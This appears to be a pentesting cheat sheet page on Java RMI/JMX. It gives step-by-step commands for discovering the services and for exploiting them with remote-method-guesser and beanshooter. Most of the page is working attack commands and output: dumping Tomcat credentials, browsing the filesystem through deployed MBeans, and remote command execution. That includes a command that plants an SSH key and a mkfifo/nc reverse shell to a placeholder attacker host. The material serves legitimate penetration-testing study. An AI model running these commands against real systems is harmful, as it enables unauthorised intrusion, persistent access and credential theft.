Pentesting Java RMI/JMX

Discovery

# Nmap identifies RMI
nmap -sC -sV TARGET -p 1099,2222,9010

# Common RMI output
2222/tcp open  java-rmi   Java RMI
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub

Common Ports:

1099 - Default RMI registry
2222 - Alternative RMI
9010 - JMX remote

remote-method-guesser (rmg)

Tool for Java RMI vulnerability scanning.

Installation

# Download release
wget https://github.com/qtc-de/remote-method-guesser/releases/download/v5.1.0/rmg-5.1.0-jar-with-dependencies.jar

Enumeration

# Basic enumeration
java -jar rmg-5.1.0-jar-with-dependencies.jar enum TARGET 2222

# Output shows:
# - Bound names (jmxrmi)
# - Codebase enumeration
# - Security manager status
# - JEP290 status
# - CVE-2019-2684 status

Method Guessing

# Guess available methods
java -jar rmg-5.1.0-jar-with-dependencies.jar guess TARGET 2222

# Example output:
# [+] - jmxrmi
# [+]         --> String getVersion()
# [+]         --> javax.management.remote.rmi.RMIConnection newClient(Object params)

Known Objects Info

# Get info on known RMI objects
java -jar rmg-5.1.0-jar-with-dependencies.jar known javax.management.remote.rmi.RMIServerImpl_Stub

# Shows vulnerabilities like MLet and Deserialization attacks

Beanshooter (JMX Exploitation)

JMX enumeration and attacking tool.

Installation

# Download release
wget https://github.com/qtc-de/beanshooter/releases/download/v4.1.0/beanshooter-4.1.0-jar-with-dependencies.jar

# Or build from source for full features (tonka shell)
sudo apt install maven
git clone https://github.com/qtc-de/beanshooter
cd beanshooter
mvn package
cd tonka-bean/
mvn package

Enumeration

# Basic enumeration
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222

# Check for unauthorized access, deserialization, available MBeans
# [+] - Remote MBean server does not require authentication.
#       Vulnerability Status: Vulnerable

Enumerate Tomcat Users via JMX

# If JMX is connected to Tomcat, can enumerate users
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222

# Output:
# [+] Enumerating tomcat users:
# [+]     - Listing 2 tomcat users:
# [+]             Username:  manager
# [+]             Password:  fhErvo2r9wuTEYiYgt
# [+]             Roles: manage-gui

List MBeans

java -jar beanshooter-4.1.0-jar-with-dependencies.jar list TARGET 2222
java -jar beanshooter-4.1.0-jar-with-dependencies.jar info TARGET 2222

File System Access via Model MBean

Deploy a Model MBean with java.io.File to enumerate the filesystem:

# Deploy MBean with java.io.File
java -jar beanshooter-4.1.0-jar-with-dependencies.jar model TARGET 2222 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'

# List directory contents
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()'

# Change directory
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/home")' objectReference

# List new directory
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()'

Remote Code Execution via StandardMBean

# Execute command (uses TemplateImpl payload)
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'whoami'

# Write SSH key
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'echo "ssh-ed25519 AAAA..." >> /home/user/.ssh/authorized_keys'

# Reverse shell (may need /bin/bash wrapper)
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec '/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER 9001 >/tmp/f"'

Tonka Shell (Full Build Required)

# Deploy tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 tonka

# Get interactive shell
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell TARGET 2222
[tomcat@TARGET /]$ whoami
tomcat

References

https://book.hacktricks.wiki/en/network-services-pentesting/1099-pentesting-java-rmi.html
https://github.com/qtc-de/remote-method-guesser
https://github.com/qtc-de/beanshooter

PreviousPentesting IPsec/IKE NextPentesting NFS

Last updated 7 days ago

hashtagDiscovery

hashtagremote-method-guesser (rmg)

hashtagInstallation

hashtagEnumeration

hashtagMethod Guessing

hashtagKnown Objects Info

hashtagBeanshooter (JMX Exploitation)

hashtagInstallation

hashtagEnumeration

hashtagEnumerate Tomcat Users via JMX

hashtagList MBeans

hashtagFile System Access via Model MBean

hashtagRemote Code Execution via StandardMBean

hashtagTonka Shell (Full Build Required)

hashtagReferences

Discovery

remote-method-guesser (rmg)

Installation

Enumeration

Method Guessing

Known Objects Info

Beanshooter (JMX Exploitation)

Installation

Enumeration

Enumerate Tomcat Users via JMX

List MBeans

File System Access via Model MBean

Remote Code Execution via StandardMBean

Tonka Shell (Full Build Required)

References